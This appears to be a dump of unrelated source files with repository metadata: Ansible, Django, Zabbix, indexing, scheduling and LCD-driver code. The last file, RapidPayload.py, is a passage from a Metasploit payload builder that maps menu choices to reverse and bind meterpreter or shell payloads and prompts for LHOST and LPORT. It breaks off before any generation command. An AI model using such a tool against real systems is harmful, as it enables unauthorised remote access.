name=name,
_id=mediatype_id
)
)
mediatype_id = delete_mediatype(module, zbx, mediatype_id)
module.exit_json(
changed=True,
msg="Mediatype deleted. Name: {name}, ID: {_id}".format(
name=name,
_id=mediatype_id
)
)
else:
params_to_update, diff = get_update_params(module, zbx, mediatype_id, **parameters)
if params_to_update == {}:
module.exit_json(
changed=False,
msg="Mediatype is up to date: {name}".format(name=name)
)
else:
if module.check_mode:
module.exit_json(
changed=True,
diff=diff,
msg="Mediatype would have been updated. Name: {name}, ID: {_id}".format(
name=name,
_id=mediatype_id
)
)
mediatype_id = update_mediatype(
module, zbx,
mediatypeid=mediatype_id,
**params_to_update
)
module.exit_json(
changed=True,
diff=diff,
msg="Mediatype updated. Name: {name}, ID: {_id}".format(
name=name,
_id=mediatype_id
)
)
else:
if state == "absent":
module.exit_json(changed=False)
else:
if module.check_mode:
module.exit_json(
changed=True,
msg="Mediatype would have been created. Name: {name}, ID: {_id}".format(
name=name,
_id=mediatype_id
)
)
mediatype_id = create_mediatype(module, zbx, **parameters)
module.exit_json(
changed=True,
msg="Mediatype created: {name}, ID: {_id}".format(
name=name,
_id=mediatype_id
)
)
if __name__ == '__main__':
main()
| 36.471671 | 142 | 0.553148 |
c5787987f7722da3d142634c98afc7e5af4beb9c
| 416 |
py
|
Python
|
2021-05-09/城市地图带后端/城市地图后端/user/serializers.py
|
ritaswc/wechat_app_template
|
d6ba56b70b09bc755f7d4d6b696b9e9b53511faa
|
[
"MIT"
] | 395 |
2017-02-24T02:59:29.000Z
|
2022-03-31T15:48:19.000Z
|
2021-05-09/城市地图带后端/城市地图后端/user/serializers.py
|
ritaswc/wechat_app_template
|
d6ba56b70b09bc755f7d4d6b696b9e9b53511faa
|
[
"MIT"
] | 7 |
2020-03-17T08:33:00.000Z
|
2021-09-02T23:10:46.000Z
|
2021-05-09/城市地图带后端/城市地图后端/user/serializers.py
|
ritaswc/wechat_app_template
|
d6ba56b70b09bc755f7d4d6b696b9e9b53511faa
|
[
"MIT"
] | 235 |
2017-03-14T03:31:38.000Z
|
2022-03-29T16:14:51.000Z
|
from .models import User
from coffee.models import Spot
from rest_framework import serializers
class UserSerializer(serializers.ModelSerializer):
# spot = serializers.PrimaryKeyRelatedField(many=True, queryset=Spot.objects.all())
class Meta:
model = User
fields = ('id', 'username', 'email', 'nickname', 'bio', 'url',
'location', 'avatar', 'client_mark', 'weixin_nickName', 'weixin_avatarUrl')
| 29.714286 | 85 | 0.725962 |
9ab91a0b1ab584a15907d88c384698640f1b442c
| 1,091 |
py
|
Python
|
Packs/Confluera/Scripts/ConflueraDetectionsSummaryWarroom/ConflueraDetectionsSummaryWarroom.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Confluera/Scripts/ConflueraDetectionsSummaryWarroom/ConflueraDetectionsSummaryWarroom.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Confluera/Scripts/ConflueraDetectionsSummaryWarroom/ConflueraDetectionsSummaryWarroom.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
from CommonServerPython import *
from CommonServerUserPython import *
from itertools import cycle
# Executes confluera-fetch-detections command/script
detections_data = demisto.executeCommand('confluera-fetch-detections', {'hours': '72'})
if len(detections_data) > 1 and detections_data[1] and detections_data[1]['Contents']:
detections = detections_data[1]['Contents']
else:
detections = []
# Generating Chart data
data: List[dict] = []
colors = cycle([
'#dc5e50',
'#64bb18',
'#8b639a',
'#d8a747',
'#528fb2',
'#9cc5aa',
'#f1934c',
'#e25b4c',
'#5bbe80',
'#c0363f',
'#cdb8a8',
'#3cc861'])
for idx, ioc in enumerate(detections):
element = [item for item in data if item['name'] == ioc['iocTactic']]
if element and len(element) != 0:
element[0]['data'][0] += 1
else:
chart_item = {
"name": ioc['iocTactic'],
"data": [1],
"color": next(colors)
}
data.append(chart_item)
return_results({
"Type": 17,
"ContentsFormat": "pie",
"Contents": {
"stats": data
}
})
| 21.82 | 87 | 0.586618 |
4955359c3848735b8bed30a788d7aa281954b644
| 1,312 |
py
|
Python
|
Inverted-Index-Construction/01-generate-inverted-table-v2.py
|
liao2000/Information-Retrieval-NCHU
|
a800aefec442fd83514c2091d0da0a2e1a9815b7
|
[
"MIT"
] | null | null | null |
Inverted-Index-Construction/01-generate-inverted-table-v2.py
|
liao2000/Information-Retrieval-NCHU
|
a800aefec442fd83514c2091d0da0a2e1a9815b7
|
[
"MIT"
] | null | null | null |
Inverted-Index-Construction/01-generate-inverted-table-v2.py
|
liao2000/Information-Retrieval-NCHU
|
a800aefec442fd83514c2091d0da0a2e1a9815b7
|
[
"MIT"
] | null | null | null |
# Build the inverted index table
# v2: keep unusual punctuation from interfering with tokenization as much as possible
from ckiptagger import WS
import json
import sqlite3
from tqdm import tqdm
import re
# Reference: https://github.com/ckiplab/ckiptagger/wiki/Chinese-README
# Download models for ckiptagger
# from ckiptagger import data_utils
# data_utils.download_data_gdown("./")
ws = WS("./data")
with open('./wiki_2021_10_05_50000.json', 'r', encoding="utf-8") as f:
data = json.load(f)
database = './table-v2.db'
conn = sqlite3.connect(database)
cursor = conn.cursor()
cursor.execute('DELETE FROM inverted_table')
conn.commit()
batch_size = 200
reg = "[\s\-,.。\::!!;;\??()\(\)\"\'《》〈〉.~—─\=「」『』、”“·/\#\[\]]"
for index in tqdm(range(len(data) // batch_size)):
input = []
for i in range(batch_size):
input.append(re.sub(reg, " ", data[index * batch_size + i]['articles']))
input.append(re.sub(reg, " ", data[index * batch_size + i]['title']))
text = ws(input)
for i in range(batch_size):
pos = 0
for key in text[i*2] + text[i*2+1]:
key = key.strip()
if key != "":
cursor.execute('INSERT INTO inverted_table(term, aid, pos) VALUES(?, ?, ?)',
(key, data[index * batch_size + i]['id'], pos))
pos += 1
conn.commit()
cursor.close()
conn.close()
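# Illustrative lookup sketch (table and column names as created above; the
# query term is an assumption):
#
# conn = sqlite3.connect(database)
# cursor = conn.cursor()
# cursor.execute('SELECT aid, pos FROM inverted_table WHERE term = ?', ('維基',))
# print(cursor.fetchall())
# conn.close()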
| 26.24 | 92 | 0.589177 |
65a0bea5651546842d1e6d77c5339b3d7bb51952
| 1,616 |
py
|
Python
|
DataGenerator/libs/WordDict.py
|
alex-ta/Fontinator
|
7ca9effe3b61ded032176557520127e1d4b7a5ef
|
[
"Apache-2.0"
] | 6 |
2017-04-12T14:05:19.000Z
|
2021-01-29T11:23:50.000Z
|
DataGenerator/libs/WordDict.py
|
alex-ta/Fontinator
|
7ca9effe3b61ded032176557520127e1d4b7a5ef
|
[
"Apache-2.0"
] | null | null | null |
DataGenerator/libs/WordDict.py
|
alex-ta/Fontinator
|
7ca9effe3b61ded032176557520127e1d4b7a5ef
|
[
"Apache-2.0"
] | null | null | null |
import random as rand
class WordDict:
"""
Allows creating a random sentence.
"""
def __init__(self, word_dict: list):
"""
        Creates a WordDict object from a list of words,
        which will be used as the random word source.
:param word_dict: A list of words
"""
self._ger_word_dict = word_dict
    @staticmethod
    def load_from_textfile(input_file_path: str, enc="UTF8"):
        """
        Creates a WordDict object from a text file.
:param input_file_path: The path to the text file
:param enc: The encoding of the text file.
:return: A WordDict object
"""
ger_word_dict = []
with open(input_file_path, encoding=enc) as f:
for line in f:
words = line.split(sep=' ')
words[len(words) - 1] = words[len(words) - 1].replace('\n', '')
ger_word_dict.extend(words)
return WordDict(ger_word_dict)
def get_sentence(self, word_count: int):
"""
        Creates a sentence with <word_count> words
:param word_count: The number of words in the returned sentence
:return: A string containing random words
"""
sentence = ""
for i in range(word_count):
r_int = rand.randint(0, len(self._ger_word_dict) - 1)
rand_word = self._ger_word_dict[r_int]
sentence += rand_word + " "
return sentence
def get_word_count(self):
"""
Returns the size of word dict
:return: The size of words in the WordDict
"""
return len(self._ger_word_dict)
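# Illustrative usage (the dictionary file name is an assumption):
#
# word_dict = WordDict.load_from_textfile('words_de.txt')
# print(word_dict.get_word_count())
# print(word_dict.get_sentence(8))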
| 32.32 | 79 | 0.58354 |
65c82d8c5206cc1c5dbd02a624082dfce464b9e5
| 1,972 |
py
|
Python
|
main.py
|
vainotuisk/Pikell
|
6b7b6e77ac69b5cbfea2c355900e68f4e1bb2825
|
[
"MIT"
] | null | null | null |
main.py
|
vainotuisk/Pikell
|
6b7b6e77ac69b5cbfea2c355900e68f4e1bb2825
|
[
"MIT"
] | null | null | null |
main.py
|
vainotuisk/Pikell
|
6b7b6e77ac69b5cbfea2c355900e68f4e1bb2825
|
[
"MIT"
] | null | null | null |
# pendulum datetime plugin ??
# scheduling via APScheduler
import sys
import os
import json
import time
from graphqlclient import GraphQLClient
from apscheduler.schedulers.background import BackgroundScheduler
from datetime import datetime
from pygame import mixer
client = GraphQLClient('https://api.graph.cool/simple/v1/cj7ebm8yt0m9s0114ngjezyec')
now = time.localtime()
mixer.init()
sisse = mixer.Sound("1.wav")
valja = mixer.Sound("2.wav")
sees = client.execute(
'''
query {allOnoffs {isSees}}
'''
)
ajad = client.execute('''
query {allHelins {
bell
hour
minute
}}
''')
print('The time is now: %s' % datetime.now())
parsed_sees = json.loads(sees)
playing = parsed_sees['data']['allOnoffs'][0]['isSees']
parsed_ajad = json.loads(ajad)
# print(parsed_ajad['data']['allHelins'])
helinate_arv = len(parsed_ajad['data']['allHelins'])
print('number of bells: ' + str(helinate_arv))
# print(parsed_ajad['data']['allHelins'][0])
def tick(x):
    print('Tick! The time is now: %s' % datetime.now())
    print('Bell is ' + str(x % 2))
    # variant with separate ring-in and ring-out sounds
# if x%2 == 1:
# sisse.play()
#
# else:
# valja.play()
    # ring-in sound only
sisse.play()
if __name__ == '__main__' and playing:
scheduler = BackgroundScheduler()
for x in range(helinate_arv):
scheduler.add_job(tick, 'cron',[x], day_of_week='mon-fri', hour=parsed_ajad['data']['allHelins'][x]['hour'],
minute=parsed_ajad['data']['allHelins'][x]['minute'], end_date='2018-06-06')
scheduler.start()
scheduler.print_jobs()
print('Press Ctrl+{0} to exit'.format('Break' if os.name == 'nt' else 'C'))
try:
# This is here to simulate application activity (which keeps the main thread alive).
while True:
time.sleep(2)
except (KeyboardInterrupt, SystemExit):
# Not strictly necessary if daemonic mode is enabled but should be done if possible
scheduler.shutdown()
| 28.57971 | 116 | 0.66785 |
b86e4e2bd618a3ee7bd66ddf4f430e4103f4ba09
| 510 |
py
|
Python
|
kollektiv5gui/util/paths.py
|
MateRyze/InformatiCup-2019
|
eeca3ff7f8a102f4093697c6badee21ce25e2e87
|
[
"MIT"
] | 3 |
2019-03-21T17:02:55.000Z
|
2019-04-04T18:16:10.000Z
|
kollektiv5gui/util/paths.py
|
MateRyze/InformatiCup-2019
|
eeca3ff7f8a102f4093697c6badee21ce25e2e87
|
[
"MIT"
] | 11 |
2019-10-30T12:05:39.000Z
|
2022-03-11T23:43:54.000Z
|
kollektiv5gui/util/paths.py
|
MateRyze/InformatiCup-2019
|
eeca3ff7f8a102f4093697c6badee21ce25e2e87
|
[
"MIT"
] | 1 |
2019-10-30T12:04:00.000Z
|
2019-10-30T12:04:00.000Z
|
import os
# store the path to the module's root directory
# this assumes that this file resides exactly
# one folder below the module's root
__ROOT_DIR = os.path.dirname(os.path.abspath(os.path.join(__file__, '..')))
__RESOURCE_DIR = os.path.join(__ROOT_DIR, 'resources')
def getModuleRoot():
"""
Returns the path to the module's root directory
"""
return __ROOT_DIR
def getResourcePath():
"""
Returns the path to the project's resource directory
"""
return __RESOURCE_DIR
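# Illustrative usage (the resource file name is an assumption):
#
# from kollektiv5gui.util import paths
# icon_path = os.path.join(paths.getResourcePath(), 'icon.png')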
| 23.181818 | 75 | 0.705882 |
b8b418e1b412569c9b5bf891f39e8243e7c86b15
| 271 |
py
|
Python
|
django101/django101/tasks/views.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | 1 |
2022-03-03T10:16:14.000Z
|
2022-03-03T10:16:14.000Z
|
django101/django101/tasks/views.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | null | null | null |
django101/django101/tasks/views.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
# from django101.tasks.models import Task
def home(request):
context = {
'title': 'Tasks manager',
# 'tasks': Task.objects.all(),
}
return render(request, 'home.html', context)
| 19.357143 | 48 | 0.645756 |
a772ae90c5d1a2528065a160ef235937b0ce5cf1
| 307 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/patches/v8_0/update_customer_pos_id.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
frappe-bench/apps/erpnext/erpnext/patches/v8_0/update_customer_pos_id.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/patches/v8_0/update_customer_pos_id.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
def execute():
frappe.reload_doctype("Customer")
frappe.db.sql(""" update `tabCustomer` set customer_pos_id = name """)
| 34.111111 | 71 | 0.76873 |
ac6433a8285dcd750789d59601cce3a0a7dda695
| 805 |
py
|
Python
|
tarefas-poo/lista-02/processa-numeros/view/paineis/painel_remove_ocorrencias.py
|
victoriaduarte/POO_UFSC
|
0c65b4f26383d1e3038d8469bd91fd2c0cb98c1a
|
[
"MIT"
] | null | null | null |
tarefas-poo/lista-02/processa-numeros/view/paineis/painel_remove_ocorrencias.py
|
victoriaduarte/POO_UFSC
|
0c65b4f26383d1e3038d8469bd91fd2c0cb98c1a
|
[
"MIT"
] | null | null | null |
tarefas-poo/lista-02/processa-numeros/view/paineis/painel_remove_ocorrencias.py
|
victoriaduarte/POO_UFSC
|
0c65b4f26383d1e3038d8469bd91fd2c0cb98c1a
|
[
"MIT"
] | null | null | null |
# --------------------------
# UFSC - CTC - INE - INE5603
# Exercise: Process Numbers (Processa Números)
# --------------------------
# Class responsible for removing the occurrences of a number.
from view.paineis.painel_abstrato import PainelAbstrato
from model.processa_numeros import remove_ocorrencias
class PainelRemoveOcorrencias(PainelAbstrato):
def __init__(self):
super().__init__('Remove Ocorrências')
def interaja(self):
numeros = self._leiaints()
continuar = True
while continuar:
            numero = self._leia1int('Enter the number to be removed: ')
            sem_numero = remove_ocorrencias(numeros, numero)
            print('The list {} without the number {} becomes {}.'.format(numeros, numero, sem_numero))
            continuar = 'y' == input('Another number? [y/n]')
| 36.590909 | 92 | 0.628571 |
3bc07407b3824c8226f94b050e3dae0f5cb4261f
| 549 |
py
|
Python
|
Nucleo/smain_Quimica.py
|
Jonatan966/SODA
|
046d8c1e7b9bac3a555526c9fe2f365c2b338aca
|
[
"MIT"
] | null | null | null |
Nucleo/smain_Quimica.py
|
Jonatan966/SODA
|
046d8c1e7b9bac3a555526c9fe2f365c2b338aca
|
[
"MIT"
] | null | null | null |
Nucleo/smain_Quimica.py
|
Jonatan966/SODA
|
046d8c1e7b9bac3a555526c9fe2f365c2b338aca
|
[
"MIT"
] | null | null | null |
qui_version = 'MODULO QUIMICA v0.0.1'
import sys
sys.path.append('Nucleo/')
sys.path.append('Modulos/Quimica/')
from Nucleo.smain_Handler import *
def soda_QUIMICA():
sMain_Saidas().Welcome("QUIMICA")
while True:
q = sMain_Saidas().Prompt("QUIMICA")
handler = sMain_Handlers().quiHandler(q)
if handler != None:
handler()
elif q == 'SAIR' or q == 'QUIT' or q == 'VOLTAR':
break
elif q == '':
pass
else:
sMain_Avisos().nFound(q, qui_version)
| 22.875 | 57 | 0.570128 |
5a09e05193b9a9c7c815e96f476bbc547e1cbaea
| 2,815 |
py
|
Python
|
.circleci/checklhe/color.py
|
tmartini/JHUGen
|
80da31668d7b7eb5b02bb4cac435562c45075d24
|
[
"Apache-2.0"
] | 3 |
2015-06-08T13:09:28.000Z
|
2020-09-04T19:59:36.000Z
|
.circleci/checklhe/color.py
|
tmartini/JHUGen
|
80da31668d7b7eb5b02bb4cac435562c45075d24
|
[
"Apache-2.0"
] | 64 |
2015-06-24T15:08:17.000Z
|
2022-01-25T04:59:32.000Z
|
.circleci/checklhe/color.py
|
tmartini/JHUGen
|
80da31668d7b7eb5b02bb4cac435562c45075d24
|
[
"Apache-2.0"
] | 19 |
2015-05-04T22:15:41.000Z
|
2021-07-06T10:04:40.000Z
|
import usefulstuff
class Color(object):
def __init__(self, id):
self.id = id
self.particles = usefulstuff.printableset()
self.antiparticles = usefulstuff.printableset()
def addparticle(self, p):
if p.color() == self.id:
self.particles.add(p)
if p.anticolor() == self.id:
self.antiparticles.add(p)
def check(self):
return linemakessense(self.particles, self.antiparticles)
def __str__(self):
return str(self.id)
def linemakessense(particles, antiparticles, start = None, end = None):
particles = particles.copy()
antiparticles = antiparticles.copy()
if not particles.isdisjoint(antiparticles):
return False
if len(particles) == len(antiparticles) == 0:
return True
if start is not None and end is not None and start is end and len(particles) + len(antiparticles) == 1 and (start in particles or start in antiparticles):
return True
for p in particles:
if p.startvertex is None:
if start is not None and start is not p:
return False
start = p
if p.endvertex is None:
if end is not None and end is not p:
return False
end = p
for p in antiparticles:
if p.endvertex is None:
if start is not None and start is not p:
return False
start = p
if p.startvertex is None:
if end is not None and end is not p:
return False
end = p
if start is None and end is not None or start is not None and end is None:
return False
if start is None and end is None:
try:
start = list(particles)[0]
end = list(particles)[0]
except IndexError: #no particles, only antiparticles
start = list(antiparticles)[0]
end = list(antiparticles)[0]
if start in particles:
nextvertex = start.endvertex
if start is not end:
particles.remove(start)
elif start in antiparticles:
nextvertex = start.startvertex
if start is not end:
antiparticles.remove(start)
else:
assert(0)
if len(particles) == len(antiparticles) == 0:
return True
possiblenextparticles = usefulstuff.printableset()
for p in particles:
if p.startvertex is nextvertex:
possiblenextparticles.add(p)
for p in antiparticles:
if p.endvertex is nextvertex:
possiblenextparticles.add(p)
return any(linemakessense(particles, antiparticles, nextparticle, end) for nextparticle in possiblenextparticles)
class Colors(dict):
def __missing__(self, id):
self[id] = Color(id)
return self[id]
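# Illustrative usage sketch: the particle objects are assumptions; they are
# expected to expose color()/anticolor() and startvertex/endvertex attributes,
# as used by Color.addparticle and linemakessense above:
#
# colors = Colors()
# for p in event_particles:
#     for c in (p.color(), p.anticolor()):
#         if c:
#             colors[c].addparticle(p)
# assert all(color.check() for color in colors.values())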
| 30.934066 | 158 | 0.602487 |
0cb255c3c3215188d9d76662a4e264c2918557a2
| 7,937 |
py
|
Python
|
MAIN/STM32F405_C/NORMAL/history/V24/display.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
MAIN/STM32F405_C/NORMAL/history/V24/display.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
MAIN/STM32F405_C/NORMAL/history/V24/display.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
from pyb import UART
import utime
import register
class LCDCommand:
class Page:
Buffer = str()
Backup = str()
Repeat = False
Headline = "P."
Entry = "1" #Page 0_1
Main = "2" #Page_1
Bye = "3" #Page_Bye
Alarm = "4" #Page_Alarm
def ClearBuffer(self):
self.Backup = str()
class Ignition:
Buffer = str()
Backup = str()
Repeat = False
Headline = "I."
On = "1" #Ignition_On
Off = "2" #Ignition_Off
def ClearBuffer(self):
self.Backup = str()
class Seat:
NumberOfSeats = register.MAX_SEAT_NUMBER
Buffer = [str()] * NumberOfSeats
Backup = [str()] * NumberOfSeats
Repeat = False
Headline = "S."
Saved = "1" #Seat_Ok
Unregistered = "2" #Seat_Unregistered
Registered = "3" #Seat_Registered
Full = "4" #Seat_Red
FullWithSeatBeltAttached = "5" #Seat_Green
BlankWithSeatBeltAttached = "6" #Seat_Yellow
PadError = "7" #Seat_Fault
HubError = "8" #Seat_Fault
PadShortCircuit = "9" #Seat_Fault
def ClearBuffer(self):
self.Backup = [str()] * self.NumberOfSeats
class Counters:
Buffer = str()
Backup = str()
Repeat = False
Headline = "C."
Default = 1 #C0-25
def ClearBuffer(self):
self.Backup = str()
class Record:
Buffer = str()
Backup = str()
Repeat = False
Headline = "R."
Default = "1" #Mode_Null
RecordMode = "2" #Mode_Record
Services = "3" #Mode_Service
def ClearBuffer(self):
self.Backup = str()
class Services:
Buffer = str()
Backup = str()
Repeat = False
Headline = "rec.pic="
On = "11"
def ClearBuffer(self):
self.Backup = str()
class Door:
Buffer = str()
Backup = str()
Repeat = False
Headline = "door.pic="
Open = "52"
Close = "51"
def ClearBuffer(self):
self.Backup = str()
class SocialDistance:
Buffer = str()
Backup = str()
Repeat = False
Headline = "SDC.pic"
On = "23"
Off = "24"
def ClearBuffer(self):
self.Backup = str()
    # SD.pic=26 -> "prohibited" warning icon
class Instructions:
Buffer = str()
Backup = str()
Repeat = False
Headline = "L."
Sleep = "0"
WakeUp = "1"
def ClearBuffer(self):
self.Backup = str()
class ProgressBar:
Buffer = str()
Backup = str()
Repeat = False
Headline = "sens.val="
def ClearBuffer(self):
self.Backup = str()
class Diagnostic:
Buffer = str()
Backup = str()
Repeat = False
Headline = "diag.txt="
def ClearBuffer(self):
self.Backup = str()
def ClearAllBuffer(self):
LCDCommand.Page.ClearBuffer(LCDCommand.Page)
LCDCommand.Ignition.ClearBuffer(LCDCommand.Ignition)
LCDCommand.Seat.ClearBuffer(LCDCommand.Seat)
LCDCommand.Counters.ClearBuffer(LCDCommand.Counters)
LCDCommand.Record.ClearBuffer(LCDCommand.Record)
LCDCommand.Services.ClearBuffer(LCDCommand.Services)
LCDCommand.Door.ClearBuffer(LCDCommand.Door)
LCDCommand.SocialDistance.ClearBuffer(LCDCommand.SocialDistance)
LCDCommand.ProgressBar.ClearBuffer(LCDCommand.ProgressBar)
LCDCommand.Diagnostic.ClearBuffer(LCDCommand.Diagnostic)
class Display():
def __init__(self):
super().__init__()
self.Setup()
def Setup(self):
#self.UART = UART(2, 115200)
self.UART = UART(3, 921600) #2000000
def Process(self):
self.Instructions()
self.Page()
self.Ignition()
self.Seat()
self.Counters()
self.Record()
#self.ProgressBar()
#self.Services()
#self.Door()
# self.SocialDistance()
#self.Diagnostic()
def Page(self):
if (LCDCommand.Page.Buffer != LCDCommand.Page.Backup) or LCDCommand.Page.Repeat:
self.SendCommand(LCDCommand.Page.Headline + LCDCommand.Page.Buffer)
LCDCommand.Page.Backup = LCDCommand.Page.Buffer
def Ignition(self):
if (LCDCommand.Ignition.Buffer != LCDCommand.Ignition.Backup) or LCDCommand.Ignition.Repeat:
self.SendCommand(LCDCommand.Ignition.Headline + LCDCommand.Ignition.Buffer)
LCDCommand.Ignition.Backup = LCDCommand.Ignition.Buffer
def Seat(self):
for i in range(LCDCommand.Seat.NumberOfSeats):
if (LCDCommand.Seat.Buffer[i] != LCDCommand.Seat.Backup[i]) or LCDCommand.Seat.Repeat:
self.SendCommand(LCDCommand.Seat.Headline + str(i) + "." + LCDCommand.Seat.Buffer[i])
LCDCommand.Seat.Backup[i] = LCDCommand.Seat.Buffer[i]
def Counters(self):
if (LCDCommand.Counters.Buffer != LCDCommand.Counters.Backup) or LCDCommand.Counters.Repeat:
self.SendCommand(LCDCommand.Counters.Headline + LCDCommand.Counters.Buffer)
LCDCommand.Counters.Backup = LCDCommand.Counters.Buffer
def Record(self):
if (LCDCommand.Record.Buffer != LCDCommand.Record.Backup) or LCDCommand.Record.Repeat:
self.SendCommand(LCDCommand.Record.Headline + LCDCommand.Record.Buffer)
LCDCommand.Record.Backup = LCDCommand.Record.Buffer
def Services(self):
if (LCDCommand.Services.Buffer != LCDCommand.Services.Backup) or LCDCommand.Services.Repeat:
self.SendCommand(LCDCommand.Services.Headline + LCDCommand.Services.Buffer)
LCDCommand.Services.Backup = LCDCommand.Services.Buffer
def Door(self):
if (LCDCommand.Door.Buffer != LCDCommand.Door.Backup) or LCDCommand.Door.Repeat:
self.SendCommand(LCDCommand.Door.Headline + LCDCommand.Door.Buffer)
LCDCommand.Door.Backup = LCDCommand.Door.Buffer
def SocialDistance(self):
if (LCDCommand.SocialDistance.Buffer != LCDCommand.SocialDistance.Backup) or LCDCommand.SocialDistance.Repeat:
self.SendCommand(LCDCommand.SocialDistance.Headline + LCDCommand.SocialDistance.Buffer)
LCDCommand.SocialDistance.Backup = LCDCommand.SocialDistance.Buffer
def Instructions(self):
if (LCDCommand.Instructions.Buffer != LCDCommand.Instructions.Backup) or LCDCommand.Instructions.Repeat:
self.SendCommand(LCDCommand.Instructions.Headline + LCDCommand.Instructions.Buffer)
LCDCommand.Instructions.Backup = LCDCommand.Instructions.Buffer
def ProgressBar(self):
if (LCDCommand.ProgressBar.Buffer != LCDCommand.ProgressBar.Backup) or LCDCommand.ProgressBar.Repeat:
self.SendCommand(LCDCommand.ProgressBar.Headline + LCDCommand.ProgressBar.Buffer)
LCDCommand.ProgressBar.Backup = LCDCommand.ProgressBar.Buffer
def Diagnostic(self):
if (LCDCommand.Diagnostic.Buffer != LCDCommand.Diagnostic.Backup) or LCDCommand.Diagnostic.Repeat:
self.SendCommand(LCDCommand.Diagnostic.Headline + LCDCommand.Diagnostic.Buffer)
LCDCommand.Diagnostic.Backup = LCDCommand.Diagnostic.Buffer
def SendCommand(self, buf=""):
try:
self.UART.write(buf)
self.NextionEndCommand()
except OSError as err:
print("OS error: {0}".format(err))
except ValueError:
print("Could not send data over UART.")
except:
print("Unexpected error!")
raise
    def NextionEndCommand(self):
        # Nextion instructions must be terminated with three 0xFF bytes
        self.UART.write(b'\xff\xff\xff')
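# --- Hedged usage sketch (added; assumes a MicroPython board with UART3 wired
# to the panel, which is why it is left commented out). Each Process() call
# transmits only the buffers that changed since the last call, so repeated
# polling keeps UART traffic minimal:
#
#     lcd = Display()
#     LCDCommand.Page.Buffer = LCDCommand.Page.Main   # request page "P.2"
#     lcd.Process()                                   # command sent once
#     lcd.Process()                                   # no change -> nothing sent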
| 33.209205 | 118 | 0.598715 |
e7e588d823e5ed86184e33ea8b50774027c4ec69
| 21,596 |
py
|
Python
|
Rapid-Payload-main/RapidPayload.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
Rapid-Payload-main/RapidPayload.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
Rapid-Payload-main/RapidPayload.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
#https://github.com/Maruf321/Rapid-Payload
import os
import platform,subprocess,re
from time import sleep
cyan= '\033[36m'
bold= '\033[1m'
end= '\033[0m'
def banner():
print(''' {1}{0}{1}
____ _ ______ __ __
/ __ \____ _____ (_)___/ / __ \____ ___ __/ /___ ____ _____/ /
/ /_/ / __ `/ __ \/ / __ / /_/ / __ `/ / / / / __ \/ __ `/ __ /
/ _, _/ /_/ / /_/ / / /_/ / ____/ /_/ / /_/ / / /_/ / /_/ / /_/ /
/_/ |_|\__,_/ .___/_/\__,_/_/ \__,_/\__, /_/\____/\__,_/\__,_/
/_/ /____/ {2}Maruf follow me on github{0}
'''.format(end,bold,cyan))
def main(platform, type):
lhost = input("\n{0}{1}RapidPayload:~/LHOST# {2}".format(cyan, bold, end))
lport = input("\n{0}{1}RapidPayload:~/LPORT# {2}".format(cyan, bold, end))
nameFile = input("\n{0}{1}RapidPayload:~/FileName# {2}".format(cyan, bold, end))
if platform == 'Windows' and type == '1':
payload= 'windows/meterpreter/reverse_http'
format= 'exe'
ext= '.exe'
if platform == 'Windows' and type == '2':
payload= 'windows/meterpreter/reverse_https'
format= 'exe'
ext= '.exe'
if platform == 'Windows' and type == '3':
payload= 'windows/meterpreter/reverse_tcp'
format= 'exe'
ext= '.exe'
if platform == 'Windows' and type == '4':
payload= 'windows/meterpreter/bind_tcp'
format= 'exe'
ext= '.exe'
if platform == 'Windows' and type == '5':
payload= 'windows/shell/bind_tcp'
format= 'exe'
ext= '.exe'
if platform == 'Windows' and type == '6':
payload= 'windows/shell/reverse_tcp'
format= 'exe'
ext= '.exe'
if platform == 'Linux' and type == '1':
payload= 'linux/x86/meterpreter_reverse_http'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '2':
payload= 'linux/x86/meterpreter_reverse_https'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '3':
payload= 'linux/x86/meterpreter/reverse_tcp'
format= 'elf'
ext= '.elf'
